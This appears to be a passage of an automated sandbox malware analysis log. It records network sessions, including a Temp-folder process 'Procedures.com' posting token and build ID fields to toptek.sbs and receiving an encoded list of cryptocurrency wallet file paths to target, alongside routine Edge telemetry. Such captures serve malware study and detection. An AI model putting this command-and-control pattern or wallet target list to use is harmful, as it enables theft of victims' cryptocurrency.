                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:47 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:24:46 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  37192.168.2.55002794.130.188.574431576C:\Users\user\AppData\Local\Temp\139308\Procedures.com
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:41 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----Y5XTR9HDBSJMYUAA1D2D
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                                  Content-Length: 331
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:41 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 59 35 58 54 52 39 48 44 42 53 4a 4d 59 55 41 41 31 44 32 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 38 32 62 32 38 63 66 63 32 36 64 35 61 61 35 30 32 39 32 66 36 35 35 33 30 36 35 33 30 32 0d 0a 2d 2d 2d 2d 2d 2d 59 35 58 54 52 39 48 44 42 53 4a 4d 59 55 41 41 31 44 32 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 59 35 58 54 52 39 48 44 42 53 4a 4d 59 55 41 41 31 44 32 44 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------Y5XTR9HDBSJMYUAA1D2DContent-Disposition: form-data; name="token"0e82b28cfc26d5aa50292f6553065302------Y5XTR9HDBSJMYUAA1D2DContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------Y5XTR9HDBSJMYUAA1D2DCont
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:42 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:24:42 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:42 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                                                                                                                                                                                                  Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  38192.168.2.55003320.42.73.244436772C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:43 UTC1044OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734931480676&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  Content-Length: 11942
                                                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                  Cookie: USRLOC=; MUID=2DB99B69D85C6DF817C28E37D9F46CAD; _EDGE_S=F=1&SID=0A0B2915223862D112663C4B235E6391; _EDGE_V=1; _C_ETH=1; msnup=
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:43 UTC11942OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 33 54 30 35 3a 32 34 3a 34 30 2e 36 37 34 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 32 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 66 38 66 35 39 31 39 39 2d 31 66 61 64 2d 34 64 64 65 2d 61 38 64 63 2d 37 37 65 62 36 30 66 62 64 66 32 36 22 2c 22 65 70 6f 63 68 22 3a 22 34 31 35 33 32 34 30 31 37 38 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-23T05:24:40.674Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"f8f59199-1fad-4dde-a8dc-77eb60fbdf26","epoch":"4153240178"},"app":{"locale
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:43 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                  Set-Cookie: MC1=GUID=46a7d321a3df40fabc52c396ccc5ef4f&HASH=46a7&LV=202412&V=4&LU=1734931483293; Domain=.microsoft.com; Expires=Tue, 23 Dec 2025 05:24:43 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                  Set-Cookie: MS0=d1f307fcfd6f471598b057ca139a576a; Domain=.microsoft.com; Expires=Mon, 23 Dec 2024 05:54:43 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                  time-delta-millis: 2617
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:24:42 GMT
                                                                                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  39192.168.2.55003420.42.73.244436772C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:43 UTC1043OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734931480679&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  Content-Length: 5219
                                                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                  Cookie: USRLOC=; MUID=2DB99B69D85C6DF817C28E37D9F46CAD; _EDGE_S=F=1&SID=0A0B2915223862D112663C4B235E6391; _EDGE_V=1; _C_ETH=1; msnup=
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:43 UTC5219OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 33 54 30 35 3a 32 34 3a 34 30 2e 36 37 38 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 33 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 66 38 66 35 39 31 39 39 2d 31 66 61 64 2d 34 64 64 65 2d 61 38 64 63 2d 37 37 65 62 36 30 66 62 64 66 32 36 22 2c 22 65 70 6f 63 68 22 3a 22 34 31 35 33 32 34 30 31 37 38 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-23T05:24:40.678Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"f8f59199-1fad-4dde-a8dc-77eb60fbdf26","epoch":"4153240178"},"app":{"locale
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:43 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                  Set-Cookie: MC1=GUID=c3a79819f97b4caabd2a97c9389ec22e&HASH=c3a7&LV=202412&V=4&LU=1734931483305; Domain=.microsoft.com; Expires=Tue, 23 Dec 2025 05:24:43 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                  Set-Cookie: MS0=09678385ed254448867ba268cec1623b; Domain=.microsoft.com; Expires=Mon, 23 Dec 2024 05:54:43 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                  time-delta-millis: 2626
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:24:43 GMT
                                                                                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  40192.168.2.55003520.42.73.244436772C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:44 UTC1033OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734931481529&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  Content-Length: 5417
                                                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                  Cookie: USRLOC=; MUID=2DB99B69D85C6DF817C28E37D9F46CAD; _EDGE_S=F=1&SID=0A0B2915223862D112663C4B235E6391; _EDGE_V=1; msnup=
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:44 UTC5417OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 33 54 30 35 3a 32 34 3a 34 31 2e 35 32 38 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 34 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 66 38 66 35 39 31 39 39 2d 31 66 61 64 2d 34 64 64 65 2d 61 38 64 63 2d 37 37 65 62 36 30 66 62 64 66 32 36 22 2c 22 65 70 6f 63 68 22 3a 22 34 31 35 33 32 34 30 31 37 38 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-23T05:24:41.528Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"f8f59199-1fad-4dde-a8dc-77eb60fbdf26","epoch":"4153240178"},"app":{"locale
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:44 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                  Set-Cookie: MC1=GUID=12aed432e05749129839a69b25b1d5c1&HASH=12ae&LV=202412&V=4&LU=1734931484178; Domain=.microsoft.com; Expires=Tue, 23 Dec 2025 05:24:44 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                  Set-Cookie: MS0=622e398bca314229bac5b66bec8fc524; Domain=.microsoft.com; Expires=Mon, 23 Dec 2024 05:54:44 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                  time-delta-millis: 2649
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:24:43 GMT
                                                                                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  41192.168.2.55003794.130.188.574431576C:\Users\user\AppData\Local\Temp\139308\Procedures.com
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:44 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----K6XT0ZUSR1N7YU3WT26P
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                                  Content-Length: 331
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
